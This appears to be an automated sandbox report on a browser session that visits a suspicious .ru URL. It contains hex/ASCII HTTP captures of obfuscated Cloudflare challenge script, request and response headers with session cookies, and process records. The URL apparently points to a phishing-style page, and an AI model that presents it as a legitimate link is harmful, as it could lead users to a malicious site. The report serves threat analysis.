                            2024-12-18 20:05:37 UTC1369INData Raw: 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69
                            Data Ascii: Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","time_check_cached_warning":"Your%20device%20clock%20i
                            2024-12-18 20:05:37 UTC1369INData Raw: 2c 66 4e 2c 66 59 2c 67 32 2c 67 39 2c 67 66 2c 67 67 2c 67 47 2c 67 48 2c 67 64 2c 67 65 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 35 37 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 35 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 31 33 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 39 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 30 30 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 33 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67
                            Data Ascii: ,fN,fY,g2,g9,gf,gg,gG,gH,gd,ge){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(457))/1*(parseInt(gI(1525))/2)+-parseInt(gI(213))/3*(parseInt(gI(519))/4)+-parseInt(gI(1400))/5+-parseInt(gI(1213))/6+parseInt(gI(1211))/7+-parseInt(g
                            2024-12-18 20:05:37 UTC1369INData Raw: 6f 5b 4a 5d 3d 5b 5d 29 2c 6f 5b 4a 5d 5b 67 50 28 31 32 39 39 29 5d 28 49 29 7d 7d 2c 65 54 3d 67 4a 28 31 33 39 37 29 5b 67 4a 28 31 33 33 38 29 5d 28 27 3b 27 29 2c 65 55 3d 65 54 5b 67 4a 28 39 34 31 29 5d 5b 67 4a 28 31 30 35 33 29 5d 28 65 54 29 2c 65 4d 5b 67 4a 28 31 30 31 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 67 52 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 67 52 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 67 52 28 31 35 33 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 2b 76 7d 2c 6a 5b 67 52 28 31 36 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 6a 5b 67 52 28 31 32 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c
                            Data Ascii: o[J]=[]),o[J][gP(1299)](I)}},eT=gJ(1397)[gJ(1338)](';'),eU=eT[gJ(941)][gJ(1053)](eT),eM[gJ(1011)]=function(h,i,gR,j,k,l,m,n,o){for(gR=gJ,j={},j[gR(1537)]=function(s,v){return s+v},j[gR(1648)]=function(s,v){return v===s},j[gR(1282)]=function(s,v){return s<
                            2024-12-18 20:05:37 UTC1369INData Raw: 28 35 36 37 29 2c 27 72 63 56 27 3a 65 4d 5b 68 35 28 31 32 30 36 29 5d 5b 68 35 28 38 32 38 29 5d 7d 2c 27 2a 27 29 7d 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 33 33 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 36 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 3d 28 68 36 3d 67 4a 2c 7b 27 53 59 4b 78 4f 27 3a 68 36 28 31 35 31 37 29 2c 27 6e 77 7a 68 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 5a 46 78 47 51 27 3a 68 36 28 35 30 36 29 2c 27 6f 53 44 50 4c 27 3a 68 36 28 31 32 31 36 29 2c 27 6b 6c 4c 42 59 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 48 46 76 51 6b 27 3a 66 75 6e 63 74 69
                            Data Ascii: (567),'rcV':eM[h5(1206)][h5(828)]},'*')}},g)},eM[gJ(1334)]=function(f,g,h,h6,i,j,k,l,m,n,o,s,x,B,C,D,E,F){i=(h6=gJ,{'SYKxO':h6(1517),'nwzhE':function(G,H){return H===G},'ZFxGQ':h6(506),'oSDPL':h6(1216),'klLBY':function(G,H,I){return G(H,I)},'HFvQk':functi
                            2024-12-18 20:05:37 UTC1369INData Raw: 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 6c 5b 68 36 28 32 35 35 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 43 3d 68 36 28 31 35 37 35 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 45 3d 28 44 3d 7b 7d 2c 44 5b 68 36 28 34 30 37 29 5d 3d 66 2c 44 5b 68 36 28 31 32 32 37 29 5d 3d 73 2c 44 2e 63 63 3d 67 2c 44 5b 68 36 28 31 36 31 30 29 5d 3d 6d 2c 44 5b 68 36 28 36 31 38 29 5d 3d 6f 2c 4a 53 4f 4e 5b 68 36 28 35 37 37 29 5d 28 44 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 6c 5b 68 36 28 34 32 34 29 5d 28 69 5b 68 36 28 39 30 37 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 36 28 31 32 30 36 29 5d 5b 68 36 28 36 36 39 29 5d 2b 27 3d 27 2c 42 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63
                            Data Ascii: ));continue;case'10':l[h6(255)]=5e3;continue;case'11':C=h6(1575);continue;case'12':E=(D={},D[h6(407)]=f,D[h6(1227)]=s,D.cc=g,D[h6(1610)]=m,D[h6(618)]=o,JSON[h6(577)](D));continue;case'13':l[h6(424)](i[h6(907)]('v_'+eM[h6(1206)][h6(669)]+'=',B));continue;c
                            2024-12-18 20:05:37 UTC1369INData Raw: 35 37 29 5d 28 68 39 28 31 33 37 38 29 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 30 3d 30 2c 66 33 3d 7b 7d 2c 66 33 5b 67 4a 28 31 33 35 36 29 5d 3d 66 32 2c 65 4d 5b 67 4a 28 31 31 39 30 29 5d 3d 66 33 2c 66 35 3d 65 4d 5b 67 4a 28 31 32 30 36 29 5d 5b 67 4a 28 31 34 39 34 29 5d 5b 67 4a 28 39 31 30 29 5d 2c 66 36 3d 65 4d 5b 67 4a 28 31 32 30 36 29 5d 5b 67 4a 28 31 34 39 34 29 5d 5b 67 4a 28 37 34 35 29 5d 2c 66 37 3d 65 4d 5b 67 4a 28 31 32 30 36 29 5d 5b 67 4a 28 31 34 39 34 29 5d 5b 67 4a 28 33 38 32 29 5d 2c 66 6a 3d 21 5b 5d 2c 66 76 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 32 37 33 29 5d 28 67 4a 28 31 33 34 33 29 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 69 68 2c 65 2c 66 2c 67 29 7b 69 68 3d 67 4a 2c 65 3d 7b 7d 2c 65 5b 69 68 28
                            Data Ascii: 57)](h9(1378),e));return![]},f0=0,f3={},f3[gJ(1356)]=f2,eM[gJ(1190)]=f3,f5=eM[gJ(1206)][gJ(1494)][gJ(910)],f6=eM[gJ(1206)][gJ(1494)][gJ(745)],f7=eM[gJ(1206)][gJ(1494)][gJ(382)],fj=![],fv=undefined,eM[gJ(273)](gJ(1343),function(d,ih,e,f,g){ih=gJ,e={},e[ih(
                            2024-12-18 20:05:37 UTC1369INData Raw: 61 28 31 31 32 31 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 6a 61 28 31 31 32 31 29 5d 3d 21 21 5b 5d 7d 2c 67 39 3d 30 2c 65 4e 5b 67 4a 28 34 34 34 29 5d 3d 3d 3d 67 4a 28 31 30 36 32 29 3f 65 4e 5b 67 4a 28 32 37 33 29 5d 28 67 4a 28 31 32 35 39 29 2c 66 75 6e 63 74 69 6f 6e 28 6a 6a 2c 63 29 7b 6a 6a 3d 67 4a 2c 63 3d 7b 27 4a 69 78 68 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 66 29 7d 7d 2c 63 5b 6a 6a 28 34 37 38 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 67 63 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 67 63 2c 30 29 2c 67 64 3d 5b 5d 2c 67 65 3d 30 3b 32 35 36 3e 67 65 3b 67 64 5b 67 65 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 33 36 32 29 5d 28 67 65 29 2c 67 65 2b 2b 29 3b 67 48 3d 28 67 66 3d 28
                            Data Ascii: a(1121)])return;eM[ja(1121)]=!![]},g9=0,eN[gJ(444)]===gJ(1062)?eN[gJ(273)](gJ(1259),function(jj,c){jj=gJ,c={'JixhZ':function(d,e,f){return d(e,f)}},c[jj(478)](setTimeout,gc,0)}):setTimeout(gc,0),gd=[],ge=0;256>ge;gd[ge]=String[gJ(1362)](ge),ge++);gH=(gf=(
                            2024-12-18 20:05:37 UTC1369INData Raw: 75 72 6e 20 69 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 6a 4e 28 31 33 36 32 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 4f 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 6a 4f 3d 6a 4e 2c 69 3d 7b 7d 2c 69 5b 6a 4f 28 31 31 36 35 29 5d 3d 6a 4f 28 31 34 38 35 29 2c 6a 3d 69 2c 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 6a 50 29 7b 72 65 74 75 72 6e 20 6a 50 3d 6a 4f 2c 6a 5b 6a 50 28 31 31 36 35 29 5d 5b 6a 50 28 33 31 38 29 5d 28 6b 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 6a 51 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 54 2c 4e 2c 4f 2c 50 2c 53 29 7b 69 66 28 6a 51 3d 6a 4e 2c 78 3d 7b 7d 2c 78 5b 6a 51 28 36 33 32 29
                            Data Ascii: urn i==h}},e=String[jN(1362)],f={'h':function(h,jO,i,j){return jO=jN,i={},i[jO(1165)]=jO(1485),j=i,null==h?'':f.g(h,6,function(k,jP){return jP=jO,j[jP(1165)][jP(318)](k)})},'g':function(j,o,s,jQ,x,B,C,D,E,F,G,H,I,J,K,L,M,T,N,O,P,S){if(jQ=jN,x={},x[jQ(632)
                            2024-12-18 20:05:37 UTC1369INData Raw: 2c 53 5b 6a 51 28 31 36 31 30 29 5d 3d 6a 51 28 32 32 33 29 2c 53 5b 6a 51 28 31 35 37 38 29 5d 3d 53 5b 6a 51 28 31 32 30 36 29 5d 5b 6a 51 28 33 31 37 29 5d 2c 53 5b 6a 51 28 31 32 32 36 29 5d 3d 6a 51 28 37 32 38 29 2c 53 5b 6a 51 28 31 34 34 33 29 5d 3d 6a 51 28 31 30 39 36 29 2c 78 5b 42 5b 6a 51 28 36 33 32 29 5d 5d 5b 6a 51 28 31 31 39 31 29 5d 28 53 2c 27 2a 27 29 29 3b 69 66 28 64 5b 6a 51 28 31 34 34 39 29 5d 28 27 27 2c 46 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 51 28 31 31 30 38 29 5d 5b 6a 51 28 37 37 31 29 5d 5b 6a 51 28 33 31 34 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 6a 51 28 31 34 32 32 29 5d 28 30 29 29 7b 69 66 28 64 5b 6a 51 28 31 32 33 36 29 5d 28 64 5b 6a 51 28 35 36 38 29 5d 2c 6a 51 28 35 31 38 29 29 29 7b 66 6f 72
                            Data Ascii: ,S[jQ(1610)]=jQ(223),S[jQ(1578)]=S[jQ(1206)][jQ(317)],S[jQ(1226)]=jQ(728),S[jQ(1443)]=jQ(1096),x[B[jQ(632)]][jQ(1191)](S,'*'));if(d[jQ(1449)]('',F)){if(Object[jQ(1108)][jQ(771)][jQ(314)](E,F)){if(256>F[jQ(1422)](0)){if(d[jQ(1236)](d[jQ(568)],jQ(518))){for


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.449756104.18.95.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:37 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:38 UTC240INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:37 GMT
                            Content-Type: image/png
                            Content-Length: 61
                            Connection: close
                            cache-control: max-age=2629800, public
                            Server: cloudflare
                            CF-RAY: 8f41c4d00dc380da-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                            Data Ascii: PNGIHDRsIDAT$IENDB`


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.449742172.67.158.294433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:38 UTC1322OUTGET /favicon.ico HTTP/1.1
                            Host: vcya.warmickmak.ru
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://vcya.warmickmak.ru/PrEvJj/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: XSRF-TOKEN=eyJpdiI6ImE0YThTWFVJa3JQdGExUjc2Mnlpbmc9PSIsInZhbHVlIjoiMUdMMlB3L1VudnIrSWhBNldjdVpRSzZTMlZmOWEwNWF0MG93SERrUUdOamFDRlpEQjIxVWtFUGZYV0gxWVFIanVRNGI3T3ZQdzlNNUlIQkJKRzNXWlNqdU5nQ0VHUGY3a3FiMmREeWlreG9Lb3M3WjExekZBVkJWVzlmd3puN3giLCJtYWMiOiI5MTNiMTU0NzgyOGZiZmFlOThiZDdhNTNkODYzYjE4ZDM4NTI2YzgyZWIzNzFhODU4MGQ2MWM4ZWY1MDJiM2VmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFEVDZENVJqTlN2bzhkSlJBQmdvWkE9PSIsInZhbHVlIjoielNiRHdObDc4N1N3OVo0RktHTWdONWJwbTJ4V2JSL2F0NjlCazNpY1lobWdYbXRCbjErdHlOWk02b1ZmUHBidUVUcW5kVHd0d3ZzajBuNXdiaGpzOWMzeUR5R1lBRlkrRHZMQTlscytTOWoxREkxVFhCSHkzYUozcUVxWHp6VWIiLCJtYWMiOiIzMzE3MGIwZmY3YmI3ZDEwYTBmOWEzNmI5MzQ5OWQ0NjliZmRlOGEyZDY0MjY5YWVjMDlkMTNiZWQ3MmZhMTQ3IiwidGFnIjoiIn0%3D
                            2024-12-18 20:05:38 UTC1071INHTTP/1.1 404 Not Found
                            Date: Wed, 18 Dec 2024 20:05:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Cache-Control: max-age=14400
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdym2354U%2FkLXVDkf6Mdy5pxyztd4NUp8IpHoHd8T3VjJBXIDVwTGw8UIciIpgPqVzh3V8o135uh3EOsDQUFjuV%2Fw4UrWdANjdrtgHFWrwq%2FNucNJ0o3HbXPUy2kTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Vary: Accept-Encoding
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=35949&min_rtt=35853&rtt_var=13513&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2338&delivery_rate=79435&cwnd=246&unsent_bytes=0&cid=db1679216dd293c5&ts=351&x=0"
                            CF-Cache-Status: HIT
                            Age: 13412
                            Server: cloudflare
                            CF-RAY: 8f41c4d57eb8f78f-EWR
                            server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1657&rtt_var=640&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1900&delivery_rate=1685912&cwnd=137&unsent_bytes=0&cid=e741a9f2e72d7bbe&ts=9877&x=0"
                            2024-12-18 20:05:38 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.449759104.18.95.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:39 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:39 UTC240INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:39 GMT
                            Content-Type: image/png
                            Content-Length: 61
                            Connection: close
                            cache-control: max-age=2629800, public
                            Server: cloudflare
                            CF-RAY: 8f41c4dbde6317e9-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                            Data Ascii: PNGIHDRsIDAT$IENDB`


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.44976135.190.80.14433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:40 UTC537OUTOPTIONS /report/v4?s=tdym2354U%2FkLXVDkf6Mdy5pxyztd4NUp8IpHoHd8T3VjJBXIDVwTGw8UIciIpgPqVzh3V8o135uh3EOsDQUFjuV%2Fw4UrWdANjdrtgHFWrwq%2FNucNJ0o3HbXPUy2kTg%3D%3D HTTP/1.1
                            Host: a.nel.cloudflare.com
                            Connection: keep-alive
                            Origin: https://vcya.warmickmak.ru
                            Access-Control-Request-Method: POST
                            Access-Control-Request-Headers: content-type
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:40 UTC336INHTTP/1.1 200 OK
                            Content-Length: 0
                            access-control-max-age: 86400
                            access-control-allow-methods: POST, OPTIONS
                            access-control-allow-origin: *
                            access-control-allow-headers: content-type, content-length
                            date: Wed, 18 Dec 2024 20:05:40 GMT
                            Via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.44976235.190.80.14433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:41 UTC476OUTPOST /report/v4?s=tdym2354U%2FkLXVDkf6Mdy5pxyztd4NUp8IpHoHd8T3VjJBXIDVwTGw8UIciIpgPqVzh3V8o135uh3EOsDQUFjuV%2Fw4UrWdANjdrtgHFWrwq%2FNucNJ0o3HbXPUy2kTg%3D%3D HTTP/1.1
                            Host: a.nel.cloudflare.com
                            Connection: keep-alive
                            Content-Length: 433
                            Content-Type: application/reports+json
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:41 UTC433OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 63 79 61 2e 77 61 72 6d 69 63 6b 6d 61 6b 2e 72 75 2f 50 72 45 76 4a 6a 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 38 2e 32 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                            Data Ascii: [{"age":0,"body":{"elapsed_time":333,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vcya.warmickmak.ru/PrEvJj/","sampling_fraction":1.0,"server_ip":"172.67.158.29","status_code":404,"type":"http.error"},"type":"network-erro
                            2024-12-18 20:05:42 UTC168INHTTP/1.1 200 OK
                            Content-Length: 0
                            date: Wed, 18 Dec 2024 20:05:42 GMT
                            Via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:15:05:15
                            Start date:18/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:15:05:18
                            Start date:18/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2052,i,8879506869332835902,1222545536640430401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:3
                            Start time:15:05:24
                            Start date:18/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vCyA.warmickmak.ru/PrEvJj/"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            No disassembly